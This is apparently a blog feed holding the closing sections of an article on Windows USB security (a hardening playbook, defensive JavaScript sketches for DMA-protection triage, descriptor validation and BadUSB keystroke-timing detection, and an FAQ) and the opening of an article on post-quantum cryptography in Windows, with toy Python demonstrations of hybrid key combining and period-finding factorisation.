Open-source memory-safe descriptor parser. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Microsoft has not committed to a similar rewrite. The bug-volume reduction from rewriting usbhub3.sys and usbccgp.sys in a memory-safe language would, on the basis of the public CVE record, dwarf any single mitigation in the article. The blocker is engineering scope, not technical feasibility. Current best partial result: the syzkaller-USB program has produced a continuously growing tally of kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb], proving the attack surface is empirically large; the upstream Rust-for-Linux USB driver experiments are the only public evidence that a memory-safe rewrite of a production USB stack is practical at scale.

Note: "Vendor adoption" sounds like a feature-request line item rather than an open research problem. It is structural. Until a host OS commits silicon-supply-chain weight to USB-IF Authentication, the standards body has no influence on the peripheral vendors; until the peripheral vendors ship Authentication-capable silicon, the host OS sees no installed base to support. Solving the two-sided-market problem is the open problem -- not the cryptography.

The shortest path to closing the descriptor-trust gap runs through silicon (USB-IF Authentication), not through Windows. Until then, every defense in this article is layered around the gap, not on top of it.

10. A 2026 USB-Security Playbook for Windows IT

We have done the structural accounting. The reader who got this far is either a Windows internals engineer who wants the exact stack picture or an IT operator who needs to deploy something on Monday. The next four sub-sections are for that operator.

For end users

Do not plug in cables you did not buy. Do not use public USB charging stations. Brian Krebs reported the original juice-jacking demonstration in August 2011: "In the three and a half days of this year's DefCon, at least 360 attendees plugged their smartphones into the charging kiosk built by the same guys who run the infamous Wall of Sheep ... Brian Markus, president of Aires Security, said he and fellow researchers Joseph Mlodzianowski and Robert Rowley built the charging kiosk to educate attendees about the potential perils of juicing up at random power stations" [@krebs-juicejacking]. CISA's 2023 juice-jacking advisory and the FBI Denver Field Office's April 6, 2023 X.com warning trace their evidence base to the Aires Security demonstration and its lineage [@wiki-juicejacking]. If you must charge in public, use a USB data-blocker dongle (a passive accessory that breaks the data pins and passes only power).

For IT admins on Windows 11 Enterprise

Note: A minimal Windows 11 Enterprise USB-hardening baseline, in priority order:

1. Enable Kernel DMA Protection. Verify msinfo32 shows "Kernel DMA Protection: On". On firmware where the toggle is off, work with the OEM to turn it on in BIOS. Documentation: [@ms-kdp].
2. Enable the ASR USB rule. Set GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 to Block via Intune or Group Policy. Verify with (Get-MpPreference).AttackSurfaceReductionRules_Ids. Documentation: [@ms-asr-rules].
3. Configure Defender for Endpoint Device Control. Default-deny Mass Storage. Allow corporate HID by VID/PID/serial allow-list. Documentation: [@ms-devcontrol].
4. Configure BitLocker To Go. Group Policy: Deny write access to removable drives not protected by BitLocker. Documentation: [@ms-bitlocker].
5. Configure GPO Device Installation Restrictions. Use AllowedDeviceClasses with explicit USB / HID setup-class GUIDs to constrain which device classes can be installed in the first place. Documentation: [@ms-gpo-devinstall] [@ms-devsetupclasses].
6. Audit USB device installation. Pull Event ID 6416 (a new external device was recognized by the system) into your SIEM. Compose a Defender XDR hunting query for rapid-keystroke bursts in the first 15 seconds after a USB attach as a BadUSB / FIN7-style HID-injection signature [@bleeping-fin7].

When KDP reports *Not capable*, one of three things is true: the platform lacks a usable IOMMU (Intel VT-d or AMD-Vi is absent or disabled in firmware), the UEFI is not publishing the DMAR / IVRS ACPI tables, or no DMA-Remapping-compatible driver is loaded for at least one externally exposed peripheral. First check `Intel VT-d` or `AMD IOMMU` in the BIOS setup screen and enable it. If it is already on, confirm in `msinfo32` that *DMA Protection: ACPI* is *On* (the firmware-tables check). If the firmware checks pass and KDP still says *Not capable*, the per-driver opt-in path is the gap: open Device Manager and, on the *Details* tab of each Thunderbolt or USB4 peripheral, inspect the *DMA Remapping Policy* property; a driver without the `DmaRemappingCompatible=1` directive in its INF will not be IOMMU-isolated and downgrades the system-wide posture. The Microsoft Learn reference walks through the per-driver opt-in [@ms-dmaremap].
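The triage order above is a three-step decision procedure, which the following sketch encodes. The input object is a hypothetical record of what an administrator observed by hand (firmware setup, msinfo32, Device Manager); the function queries nothing on the system and the field names are assumptions.

```javascript
// observations (hypothetical shape):
//   iommuEnabled:        Intel VT-d / AMD IOMMU is on in firmware setup
//   acpiTablesPublished: firmware publishes the DMAR / IVRS tables
//   drivers: [{ name, external, dmaRemappingCompatible }]
function diagnoseKdp(observations) {
  // Layer 1: silicon and firmware toggle.
  if (!observations.iommuEnabled) {
    return "Enable Intel VT-d or AMD IOMMU in firmware setup";
  }
  // Layer 2: firmware tables.
  if (!observations.acpiTablesPublished) {
    return "Firmware is not publishing DMAR / IVRS tables";
  }
  // Layer 3: per-driver opt-in, for externally exposed peripherals only.
  const gaps = observations.drivers
    .filter((d) => d.external && !d.dmaRemappingCompatible)
    .map((d) => d.name);
  if (gaps.length > 0) {
    return `Drivers without DMA-remapping opt-in: ${gaps.join(", ")}`;
  }
  return "No gap found by this checklist";
}

const laptop = {
  iommuEnabled: true,
  acpiTablesPublished: true,
  drivers: [
    { name: "dock-nic.sys", external: true, dmaRemappingCompatible: false },
    { name: "internal-nvme.sys", external: false, dmaRemappingCompatible: false },
  ],
};
console.log(diagnoseKdp(laptop));
```

The ordering matters: a missing IOMMU or missing ACPI tables makes the driver question moot, so the sketch returns at the first failing layer rather than listing every problem at once.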

For driver developers

Declare DmaRemappingCompatible=1 in your INF if your hardware tolerates IOMMU isolation; this is a one-line directive change with a system-wide security posture improvement [@ms-dmaremap]. Prefer the WDF USB Lower / Upper filter pattern over legacy WDM; the framework's lifecycle and PnP plumbing are correct by construction in ways that legacy WDM code is not [@ms-usb-3-0-stack]. Validate every descriptor byte in user-mode tooling before relying on usbhub3.sys to do so; if your device cannot survive its own validator, the descriptor parser surface is wider than it needs to be. If you are writing a vendor-specific function driver, prefer winusb.sys over a custom KMDF function driver where possible [@ms-winusb]; less kernel-mode code is unambiguously better.
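As one possible shape for the user-mode validator recommended above, the sketch below walks a raw configuration descriptor blob and reports structural problems: a bad header, a `wTotalLength` that disagrees with the blob, a sub-descriptor whose `bLength` is too small or overruns the buffer, and a `bNumInterfaces` that does not match the interfaces actually present. The function name and sample blobs are illustrative, and the checks are a small subset of what a production validator would cover.

```javascript
// Returns a list of human-readable problems; an empty list means none found.
function validateConfigDescriptor(buf) {
  // Header: bLength = 9, bDescriptorType = 0x02 (CONFIGURATION).
  if (buf.length < 9 || buf[0] !== 9 || buf[1] !== 0x02) {
    return ["missing or malformed configuration descriptor header"];
  }
  const errors = [];
  const totalLength = buf[2] | (buf[3] << 8); // wTotalLength, little-endian
  if (totalLength !== buf.length) {
    errors.push(`wTotalLength ${totalLength} does not match blob length ${buf.length}`);
  }
  const interfaces = new Set();
  let offset = 0;
  while (offset < buf.length) {
    const bLength = buf[offset];
    if (bLength < 2) {
      errors.push(`bLength ${bLength} at offset ${offset} is too small`);
      break; // cannot advance safely
    }
    if (offset + bLength > buf.length) {
      errors.push(`descriptor at offset ${offset} overruns the buffer`);
      break;
    }
    if (buf[offset + 1] === 0x04) { // INTERFACE descriptor
      if (bLength < 9) {
        errors.push(`interface descriptor at offset ${offset} is shorter than 9 bytes`);
      } else {
        interfaces.add(buf[offset + 2]); // bInterfaceNumber
      }
    }
    offset += bLength;
  }
  if (interfaces.size !== buf[4]) {
    errors.push(`bNumInterfaces is ${buf[4]} but ${interfaces.size} interface(s) were found`);
  }
  return errors;
}

// A configuration header followed by one HID interface descriptor (18 bytes).
const wellFormed = [9, 0x02, 18, 0, 1, 1, 0, 0x80, 50, 9, 0x04, 0, 0, 0, 0x03, 0x01, 0x01, 0];
// Same blob, but the interface descriptor claims to be 12 bytes long.
const overrun = wellFormed.slice();
overrun[9] = 12;

console.log(validateConfigDescriptor(wellFormed));
console.log(validateConfigDescriptor(overrun));
```

Every check here is a bounds or consistency test on attacker-controllable length fields, which is the category of mistake the descriptor-parser CVE record is made of.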

For red team and blue team

The reproducible test devices are USB Rubber Ducky II + DuckyScript 3.0 [@hak5-shop-ducky] [@hak5-ducky-docs] and the O.MG Cable [@omg-cable]. For inspection, usbview.exe from the Windows SDK reads live descriptor trees out of usbhub3.sys and is the closest thing Windows has to a USB-side lsusb -v. For trace evidence, the ETW providers Microsoft-Windows-USB-USBHUB3 and Microsoft-Windows-USB-USBPORT (older stack) carry enumeration sequences with per-stage timing, documented end-to-end in Microsoft's USB Event Tracing for Windows reference [@ms-usb-etw]; wireshark + USBPcap reads the raw descriptor bytes if the kernel-side capture is permitted. For blue-team detection, the BadUSB signature is "first observed time-since-attach to first keystroke event is less than 200 ms"; legitimate human-driven keyboards do not type at that rate.
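The blue-team signature above reduces to a single comparison per attach event. The sketch assumes two hypothetical telemetry streams (`attaches` and `keystrokes`) that can be joined on a per-device identifier; whether a given sensor can attribute keystrokes to a specific device is an assumption to check before relying on anything like this.

```javascript
const THRESHOLD_MS = 200; // attach-to-first-keystroke threshold from the text

// attaches:   [{ deviceId, timeMs }]  one record per USB attach
// keystrokes: [{ deviceId, timeMs }]  one record per keystroke event
// Returns the deviceIds whose first keystroke followed the attach too quickly.
function flagFastFirstKeystroke(attaches, keystrokes) {
  return attaches
    .filter((attach) => {
      // Earliest keystroke from this device at or after the attach time.
      const firstKeystrokeMs = keystrokes
        .filter((k) => k.deviceId === attach.deviceId && k.timeMs >= attach.timeMs)
        .reduce((earliest, k) => Math.min(earliest, k.timeMs), Infinity);
      // With no keystrokes the difference is Infinity, which never flags.
      return firstKeystrokeMs - attach.timeMs < THRESHOLD_MS;
    })
    .map((attach) => attach.deviceId);
}

const attaches = [
  { deviceId: "implant", timeMs: 1000 },
  { deviceId: "desk-keyboard", timeMs: 2000 },
  { deviceId: "thumb-drive", timeMs: 3000 },
];
const keystrokes = [
  { deviceId: "implant", timeMs: 1050 },       // 50 ms after attach
  { deviceId: "implant", timeMs: 1055 },
  { deviceId: "desk-keyboard", timeMs: 9000 }, // 7 s after attach
];
const flagged = flagFastFirstKeystroke(attaches, keystrokes);
console.log(flagged);
```

A payload that simply waits before typing evades a fixed threshold, so this is better treated as one signal to join with others (such as a composition change after attach) than as a standalone detection.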

The playbook is layered defense. None of these controls closes the descriptor-trust gap; together they raise the cost enough that the BadUSB-class attacks the article opens with become attacker-uneconomical in a corporate context. The structural problem is still open.

11. Frequently Asked Questions

The reader has the model. These are the seven misconceptions the model corrects.

Does BitLocker To Go protect against a malicious USB device?

No. BitLocker To Go protects *the data on the stick* if you lose it. A reprogrammed thumb drive that re-enumerates as a HID keyboard is unaffected because BitLocker never sees it as a managed volume in the first place [@ms-bitlocker]. BitLocker is a confidentiality control for data at rest on a removable volume; the malicious-peripheral problem is a problem of *peripheral authentication*, which is outside BitLocker's threat model.

Does Kernel DMA Protection stop BadUSB?

No. KDP blocks pre-login DMA from PCIe-class peripherals tunneled over Thunderbolt 3, Thunderbolt 4, or USB4 [@ms-kdp]. A USB 2.0 thumb drive performs no DMA at all, so KDP is not in its defense chain. KDP is a defense against a different attack class than BadUSB. They are complementary, not substitutable.

Does driver signing protect against malicious peripherals?

No. Driver signing certifies that Microsoft (or an OEM signing under Microsoft's signing infrastructure) approved the driver *code* [@ms-kmcs] [@ms-drvsigning]. It does not certify the *descriptors* the driver consumes at runtime. The signed `hidclass.sys` will load happily and inject keystrokes for any HID-class device whose descriptor declares it to be a keyboard, including a reprogrammed thumb drive. KMCS is a defense of the kernel against malicious drivers, not a defense of the kernel against malicious peripherals presenting valid descriptors to honest drivers. The Aside in Section 5 walks through this point in detail.

Did disabling AutoRun fix USB malware?

No, it closed one vector. The 2011 KB971029-equivalent rollout disabled `autorun.inf`-driven AutoPlay execution by default [@krebs-feb2011] [@wiki-autorun]. That vector was the load-bearing one for the Conficker era. It did not affect HID injection (which Hak5 had already commercialized in 2010), it did not affect descriptor-parser bugs (which Andy Davis named at Black Hat 2011 [@ncc-davis-2011]), and it did not affect the LNK-icon attack class (which the same Patch Tuesday addressed separately [@nvd-cve-2010-2568]). Each closed vector was a single-bug closure that left adjacent vectors intact.

Is the O.MG Cable real, or a movie trope?

Real. The cable is commercially available; the firmware is technically documented in the product's own materials [@omg-cable]; the same primitive (a USB cable with a WiFi-enabled implant) is now in the FBI's threat reporting on FIN7 mailed-USB campaigns [@bleeping-fin7]. On a stock Windows 11 25H2 endpoint, the O.MG Cable's HID-injection primitive works exactly as advertised unless explicit Microsoft Defender for Endpoint Device Control policy blocks the HID class for that VID/PID/serial [@ms-devcontrol]. It is not a movie trope.

Will USB-IF Authentication fix this?

Not yet, and not by itself. The USB-IF Authentication Specification Revision 1.0 ECN dates from January 7, 2019 [@usbif-auth-spec]. The standard defines ECDSA P-256 over SHA-256 with X.509 chains -- everyday cryptography. The structural problem is two-sided market adoption: no host operating system (Windows, macOS, Linux, ChromeOS) consumes the standard in-box in 2026, and no major device-certification tier requires it. Until that loop closes, the standard's existence is necessary but not sufficient.

Can I just disable USB in firmware?

Mostly, with significant cost. Disabling USB controllers at firmware time blocks every USB attack class because no descriptors are ever parsed. It also blocks every keyboard, every mouse, every security token, every licensed peripheral, every biometric reader, every printer that does not speak network protocols, and every legitimate file transfer onto and off of the endpoint. The cost is usually higher than the threat for general-purpose business endpoints, but the trade-off is a legitimate one for tightly scoped roles like air-gapped industrial-control workstations.

Plugging in a USB device is the single most-trusted action a user routinely performs on a Windows machine. Windows has done forty years of work to walk that trust back -- bit by bit, single-bug closure by single-bug closure, generation by generation. Some of that work is silicon-level (Kernel DMA Protection over IOMMU). Some of it is kernel-level (Kernel-Mode Code Signing chained to a Microsoft-trusted root). Some of it is application-level (Attack Surface Reduction, Device Control, AutoRun disablement, BitLocker To Go). None of it -- not one of the ten generations the article walks -- has touched the descriptor-trust premise itself. A peripheral's self-declared identity is still its identity at enumeration time, in 2026 as in 1996.

The next breakthrough on this stack will not come from Windows. It will come from USB-IF Authentication finally shipping in commodity peripheral silicon, and a host operating system committing to consume it in-box. That shipment has now been seven years away for seven years. When it arrives -- if it arrives -- the descriptor-trust gap closes, the BadUSB primitive becomes detectable in the bus enumeration handshake, and the eleven kernel-mode operations that begin at 10:42:17 each morning finally consult something the peripheral cannot fake. Until then, the gap is the gap, and the layered mitigations Windows ships are what stand between a Phison microcontroller and your domain administrator credentials.

Post-Quantum Cryptography on Windows: The Thirty-Year Migration That Just Arrived

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

**Post-quantum cryptography arrived on Windows in 2024-2026.** NIST finalised FIPS 203 (ML-KEM), FIPS 204 (ML-DSA), and FIPS 205 (SLH-DSA) on August 13, 2024 [@nist-fips-approved-news]. SymCrypt has shipped ML-KEM, ML-DSA, LMS, and composite-ML-KEM implementations across versions 103.5.0 through 103.11.0; CNG exposes them as `BCRYPT_MLKEM_ALG_HANDLE` and `BCRYPT_MLDSA_ALGORITHM`; Schannel can negotiate hybrid TLS 1.3 `X25519MLKEM768` (codepoint 0x11EC) on 24H2 behind Group Policy [@symcrypt-changelog, @cng-mlkem-examples, @draft-tls-ecdhe-mlkem]. The migration closes the harvest-now-decrypt-later channel for TLS-protected traffic, leaves the signed-binary persistence channel open, and is structurally constrained by the 4096-byte TPM 2.0 command buffer, which ML-DSA-87's 4627-byte signatures overflow [@fips-204-pdf, @wolfssl-wolftpm-v185].

1. The 1184-Byte Field

A Windows endpoint opens a connection to cloudflare.com. In its ClientHello, alongside the 32-byte X25519 public value every TLS 1.3 handshake has carried since 2018, sits a new 1184-byte field whose contents look like uniform noise -- an ML-KEM-768 encapsulation key, the bytes by which Microsoft, Cloudflare, Google, Apple, and OpenSSH have chosen to close a future they cannot yet see [@draft-tls-ecdhe-mlkem, @cloudflare-pq-2024].

Two adversaries are watching the handshake. The first has 2026 compute and cannot break either share. The second has a hypothetical 2040 fault-tolerant quantum computer, breaks the X25519 share trivially via Shor's algorithm, and walks away unable to recover the ML-KEM-768 session key. Why does the handshake hold against the second adversary, and what did it take to make that field 1184 bytes long?

Post-quantum cryptography (PQC): A family of cryptographic algorithms whose security rests on mathematical problems for which no efficient quantum algorithm is known. PQC is a public-key replacement programme: it replaces RSA, Diffie-Hellman, and elliptic-curve discrete-log primitives that Shor's algorithm collapses in polynomial time on a fault-tolerant quantum computer. Symmetric primitives (AES, SHA-2/3) survive with parameter increases and are not the target of PQC standardisation.

The wire format is concrete and currently shipping. The IETF draft draft-ietf-tls-ecdhe-mlkem-04 (published 8 February 2026) defines three hybrid Supported Groups codepoints in TLS 1.3: X25519MLKEM768 at 0x11EC, SecP256r1MLKEM768 at 0x11EB, and SecP384r1MLKEM1024 at 0x11ED [@draft-tls-ecdhe-mlkem, @iana-tls-parameters]. For X25519MLKEM768, the ClientHello key_share entry carries the 1184-byte ML-KEM-768 encapsulation key followed by the 32-byte X25519 public value, 1216 bytes in total. The ServerHello reply carries the 1088-byte ML-KEM-768 ciphertext followed by the 32-byte X25519 public value, 1120 bytes in total. Both endpoints derive an X25519 shared secret and an ML-KEM-768 shared secret, concatenate them, and feed the concatenation into TLS 1.3's HKDF-Extract per draft-ietf-tls-hybrid-design-16 [@draft-tls-hybrid]. An adversary who can break one component but not the other still learns nothing about the session key.
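The byte counts and the concatenate-then-extract step can be checked with a few lines of Python. This is a minimal sketch, not Schannel's implementation: the two component secrets are random stand-ins rather than outputs of a real key exchange, the all-zero salt is a placeholder for the value the TLS 1.3 key schedule would supply, and the order in which the two secrets are concatenated is an assumption of the sketch (the draft fixes it per named group).

```python
import hashlib
import hmac
import os

# Sizes quoted in the text, in bytes.
X25519_PUBLIC = 32
MLKEM768_ENCAPS_KEY = 1184
MLKEM768_CIPHERTEXT = 1088
COMPONENT_SECRET = 32  # each component yields a 32-byte shared secret

client_share_len = X25519_PUBLIC + MLKEM768_ENCAPS_KEY
server_share_len = X25519_PUBLIC + MLKEM768_CIPHERTEXT


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """HKDF-Extract (RFC 5869) with SHA-256: HMAC keyed by the salt."""
    return hmac.new(salt, ikm, hashlib.sha256).digest()


def combine(first: bytes, second: bytes, salt: bytes) -> bytes:
    """Concatenate both component secrets, then extract a single key."""
    return hkdf_extract(salt, first + second)


# Hypothetical stand-ins: no real X25519 or ML-KEM operation happens here.
mlkem_secret = os.urandom(COMPONENT_SECRET)
x25519_secret = os.urandom(COMPONENT_SECRET)
salt = bytes(32)  # placeholder for the key-schedule salt

handshake_secret = combine(mlkem_secret, x25519_secret, salt)
print(client_share_len, server_share_len, len(handshake_secret))
```

Because the extract step hashes the concatenation of both secrets, replacing either input with a fresh random value changes the output. That is the property the hybrid design relies on: the derived key stays unpredictable as long as one of the two components remains unbroken.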

Harvest-now-decrypt-later: A threat model in which an adversary records today's network traffic and stores it for years, decrypting it once a sufficiently capable quantum computer is available. The threat applies to any traffic whose secrecy must survive past the time-to-cryptographically-relevant-quantum-computer; it does not apply to signed-binary integrity, which is validated at load time. Hybrid TLS shifts the boundary from "must trust X25519 forever" to "must trust either X25519 or ML-KEM-768 forever" [@cloudflare-pq-2024, @mosca-2015].

The first internet-scale deployment of the construction landed on October 3, 2022, when Cloudflare turned on hybrid post-quantum key agreement by default for every website and API on its edge [@cloudflare-pq-for-all]. Cloudflare's blog post measured the bytes-on-the-wire cost of the deployment as roughly 1.1 KB added per handshake; by March 2024 nearly two percent of all TLS 1.3 connections to Cloudflare's edge negotiated post-quantum key agreement, with double-digit adoption forecast by year-end [@cloudflare-pq-2024]. The Cloudflare default-on date predated FIPS 203's August 2024 finalisation by almost two years, which is why early deployments speak of "Kyber" and "X25519Kyber768Draft00" rather than ML-KEM.

Apple's iMessage PQ3 followed in February 2024, framed as "Level 3" -- post-quantum key establishment plus post-quantum ratcheting [@apple-imessage-pq3]. By May 2026, Microsoft, Google, OpenSSH, and Signal have all shipped or announced hybrid post-quantum key agreement; Section 7 catalogues the per-vendor deployments verbatim, anchored to each vendor's own release artifact [@cloudflare-pq-2024, @signal-pqxdh, @openssh-9-9].

This article delivers two promises. The first is algorithm-level: by the end of Section 5 you will know ML-KEM, ML-DSA, and SLH-DSA well enough to reason about parameter-set choices, side-channel posture, and FIPS-mandated byte counts. The second is platform-level: by the end of Section 6 you will know which CNG identifier ships in which SymCrypt release, which Schannel toggle gates X25519MLKEM768 on 24H2, and which Windows surfaces (Schannel, AD CS, .NET 10, Azure Key Vault) carry PQC in May 2026 and which (IKEv2, SMB, RDP, BitLocker network unlock, Kerberos PKINIT, Windows Hello attestation) do not.

Every line of code, every parameter set, every byte of that 1184-byte field has a thirty-year story behind it. To understand what shipped, we start where it began -- with a 1994 paper that put a clock on every public-key cryptosystem then in production.

2. Historical Origins

Why is replacing public-key cryptography hard? Because in 1976, Whitfield Diffie and Martin Hellman defined the primitive that everything since has imitated. Their "New Directions in Cryptography" paper, in IEEE Transactions on Information Theory 22(6), introduced the asymmetric key-agreement model [@dh-1976]: two parties exchange public values, derive a shared secret, and never share the underlying private state. The security of the shared secret rested on the hardness of computing discrete logarithms in a finite group. Every public-key construction that followed -- RSA (1977), the Diffie-Hellman variants, DSA (1991), ECDSA and the elliptic-curve variants (mid-1980s into the 1990s, with X25519 standardised in RFC 7748 in 2016) -- inherited one of two hard problems: integer factoring, or the discrete logarithm in some abelian group [@rfc-7748].

Eighteen years later, Peter Shor at Bell Labs found a polynomial-time quantum algorithm for both [@shor-1996]. The arXiv preprint quant-ph/9508027 dates to August 1995; the journal version appeared as "Polynomial-Time Algorithms for Prime Factorization and Discrete Logarithms on a Quantum Computer" in SIAM Journal on Computing 26(5) (1997) 1484-1509; DOI 10.1137/S0097539795293172. Shor's algorithm requires a fault-tolerant quantum computer with thousands of logical qubits -- the kind of machine that does not yet exist, and may never exist in some accounts. But if it does exist, RSA, DH, DSA, ECDSA, and ECDH all collapse simultaneously. Not weakened; broken. Doubling key sizes does not help; the algorithm's runtime is polynomial in the key length.

Shor's algorithm: A polynomial-time quantum algorithm, due to Peter Shor (1994-1996), that solves integer factoring and the discrete logarithm in arbitrary abelian groups [@shor-1996]. The algorithm reduces both problems to finding the period of a function via the Quantum Fourier Transform, which a fault-tolerant quantum computer can compute in time polynomial in the input size. RSA, finite-field Diffie-Hellman, DSA, and the elliptic-curve variants ECDH/ECDSA/X25519 are all structurally retired by Shor's algorithm; no parameter increase rescues them.
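The reduction from factoring to period finding can be seen on a toy modulus. The sketch below is entirely classical: it finds the period by brute force, which is the one step Shor's algorithm replaces with a quantum subroutine, and it takes exponential time on real key sizes. The function names are illustrative and not taken from any library.

```python
from math import gcd


def multiplicative_order(a: int, n: int) -> int:
    """Smallest r > 0 with a**r % n == 1, found by brute force."""
    if gcd(a, n) != 1:
        raise ValueError("a must be coprime to n")
    r, value = 1, a % n
    while value != 1:
        value = (value * a) % n
        r += 1
    return r


def factor_from_period(a: int, n: int):
    """Try to split n using the period of x -> a**x mod n."""
    r = multiplicative_order(a, n)
    if r % 2 == 1:
        return None  # odd period: retry with another base
    half = pow(a, r // 2, n)
    if half == n - 1:
        return None  # a**(r/2) is -1 mod n: retry with another base
    # half**2 == 1 mod n with half != +-1, so both gcds are proper factors.
    return gcd(half - 1, n), gcd(half + 1, n)


print(multiplicative_order(7, 15))  # period of 7**x mod 15
print(factor_from_period(7, 15))    # factors recovered from that period
```

With base 7 and modulus 15 the period is 4, and the two gcd computations return 3 and 5. Base 14 illustrates the retry case: its period is 2, but 14 is congruent to -1 mod 15, so the function returns `None`.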

Two years later, Lov Grover (also at Bell Labs) published the symmetric-key counterpart. Grover's algorithm searches an unstructured database of N items in O(sqrt(N)) quantum steps [@grover-1996]. Applied to AES-128, Grover reduces the effective key strength to roughly $2^{64}$ quantum-search steps -- comparable to a 64-bit symmetric key. Applied to AES-256, it leaves 128 bits of security. The asymmetric lane is fatal; the symmetric lane is a parameter bump. This is why the entire post-quantum programme is a public-key replacement programme, not a symmetric one.

The standard policy response to Grover is to double the symmetric key size. AES-256 retains 128 bits of post-quantum security; SHA-384 retains 192 bits of preimage resistance; SHA-512 retains 256 bits. CNSA 2.0 mandates AES-256 and SHA-384 specifically for this reason [@cnsa20-csa]. Grover-style speedups do not generalise to AEAD constructions in the same way the asymmetric collapse does; the cost of doubling is structural and easy to absorb, which is why no one tries to invent a "post-quantum AES."
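The halving rule is simple arithmetic, sketched here under the idealised assumption that Grover's square-root speedup applies with no overhead (real quantum circuits would add large constant factors). The helper name is illustrative.

```python
from math import isqrt


def grover_effective_bits(key_bits: int) -> int:
    """Security level left after a square-root search speedup."""
    return key_bits // 2


for name, bits in [("AES-128", 128), ("AES-256", 256),
                   ("SHA-384 preimage", 384), ("SHA-512 preimage", 512)]:
    print(f"{name}: {bits} classical bits, {grover_effective_bits(bits)} against Grover")

# The same statement in search steps: sqrt(2**128) is 2**64.
print(isqrt(2**128) == 2**64)
```

Doubling the key length restores the original margin, which is why the symmetric side needs a parameter change rather than a new primitive.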

If Shor and Grover are 1994-1996 results, why is replacing public-key cryptography not a 2040 problem? Michele Mosca's 2015 ePrint 2015/1075 named the deadline. Mosca's inequality is one line:

$$X + Y > Z$$

where X is the security shelf-life of the data (how long today's traffic must remain confidential), Y is the migration time (how long it takes to deploy quantum-safe systems), and Z is the time until a cryptographically relevant quantum computer arrives. If X + Y exceeds Z, the adversary harvesting traffic today wins regardless of when the quantum computer arrives [@mosca-2015].

Mosca's inequality: The deadline relation $X + Y > Z$: if data-secrecy lifetime (X) plus migration time (Y) exceeds time-to-quantum-computer (Z), harvest-now-decrypt-later succeeds. Mosca's framing turned an open quantum-engineering timeline into an actionable IT-policy lever; if you cannot predict Z, you must minimise Y, which means starting migration now [@mosca-2015].

If the security shelf-life of your data plus the migration time to deploy quantum-safe systems exceeds the time-to-quantum-computer, the adversary harvesting traffic today wins. -- the X + Y > Z framing, Mosca (eprint 2015/1075).
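The inequality translates directly into a planning check. The sketch below is illustrative only: the function names and the example year counts are hypothetical inputs, not estimates from Mosca's paper or from this article.

```python
def mosca_at_risk(shelf_life_years: float,
                  migration_years: float,
                  years_to_quantum: float) -> bool:
    """True when X + Y > Z, i.e. harvested traffic outlives its protection."""
    return shelf_life_years + migration_years > years_to_quantum


def exposure_years(shelf_life_years: float,
                   migration_years: float,
                   years_to_quantum: float) -> float:
    """Years during which still-sensitive data would be decryptable."""
    return max(0.0, shelf_life_years + migration_years - years_to_quantum)


# Hypothetical scenario: 10-year secrecy requirement, 5-year migration,
# and a quantum computer assumed to arrive in 14 years.
print(mosca_at_risk(10, 5, 14), exposure_years(10, 5, 14))

# Same horizon, but short-lived data and a faster migration.
print(mosca_at_risk(2, 3, 14), exposure_years(2, 3, 14))
```

Since Z is outside an organisation's control and X is usually set by regulation or contract, Y is the only term the check lets a planner shrink.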

On September 7, 2022, the U.S. National Security Agency turned Mosca's inequality into national-security policy. The Commercial National Security Algorithm Suite 2.0 (CNSA 2.0) is the algorithm list the NSA requires for protecting U.S. National Security Systems [@nsa-cnsa-news, @cnsa20-csa]. The current revision (May 30, 2025) names ML-KEM-1024 for key establishment, ML-DSA-87 for general digital signatures, LMS and XMSS for firmware signing, AES-256 for symmetric encryption, and SHA-384 for hashing. The policy carries four dates that drive every U.S. vendor roadmap including Microsoft's: acquisition preference for PQC in new National Security Systems by January 1, 2027; legacy-algorithm phase-out beginning December 31, 2030; mandatory PQC adoption by December 31, 2031; and disallowance of RSA / ECDSA after 2035.

Shor's algorithm requires a fault-tolerant quantum computer that does not yet exist. So why isn't the migration easy? Because cryptographers tried to replace the asymmetric primitive for thirty years before this paper -- and every early attempt failed in a different way.

3. Early Approaches and Their Failures

Three rejected family trees and one almost-survivor explain why ML-KEM looks the way it does in 2026. Each was tried; each failed in a specific way; the failure shaped what survived.

McEliece (1978) is the oldest post-quantum proposal still under active study. Robert McEliece's construction uses the hardness of decoding a general linear code -- specifically, a binary Goppa code disguised by random permutations and a scrambling matrix [@mceliece-1978]. The cryptosystem has survived forty-eight years of cryptanalysis with no structural break; its security argument is one of the most conservative in cryptography. The cost is the public key. Classic McEliece at NIST security category 1 has public keys of roughly 261 kilobytes; at category 5, about 1 megabyte [@mceliece-project]. That size makes it unusable in TLS, where the entire ClientHello must fit in one or two IP packets. Classic McEliece survives as a Round-4 NIST candidate; it was not selected for FIPS standardisation because of the key-size constraint, but is widely cited as the conservative fallback for long-term archival key wrapping.

HFE and multivariate cryptography (1996) form the most thoroughly broken family. Jacques Patarin's Hidden Field Equations (HFE) hide the structure of a univariate polynomial over a small extension field by composing with random linear transformations on each side. Kipnis and Shamir broke the original HFE construction in 1999 [@kipnis-shamir-1999]. The descendant scheme Rainbow advanced through three NIST rounds before Ward Beullens published "Breaking Rainbow Takes a Weekend on a Laptop" in eprint 2022/214 on 25 February 2022, recovering Rainbow's secret key in 53 hours on a commodity laptop [@beullens-rainbow-2022].

53 hours on a commodity laptop is the visceral data point. Rainbow had been a NIST third-round signature finalist; one paper, one weekend of CPU time, retired it. Beullens' result is now the canonical example in PQC pedagogy of how a cryptographic finalist can be retired by an algorithmic insight that nobody noticed during more than four years of NIST evaluation. The multivariate signature lane is effectively closed in 2026, with the partial exception of small specialised constructions (UOV-style schemes) that NIST is considering in the additional-signatures onramp [@nist-pqc-dig-sig].

NTRU (1996) is the founding lattice cryptosystem. Jeffrey Hoffstein, Jill Pipher, and Joseph Silverman presented "NTRU: A ring-based public key cryptosystem" at ANTS-III in 1998 [@ntru-1996]. The construction works in a polynomial ring $R = \mathbb{Z}[X]/(X^n - 1)$ and offers public keys of roughly 1-2 kilobytes -- the first lattice cryptosystem with sizes competitive with RSA. NTRU was patent-encumbered for two decades (US Patents 6,081,597 and 6,144,740 expired in August and November 2017) [@ntru-patents], which kept it out of standards work for the formative years. Falcon, the NIST-selected lattice signature scheme now being standardised as FIPS 206 (still in draft), inherits the NTRU lattice structure directly.

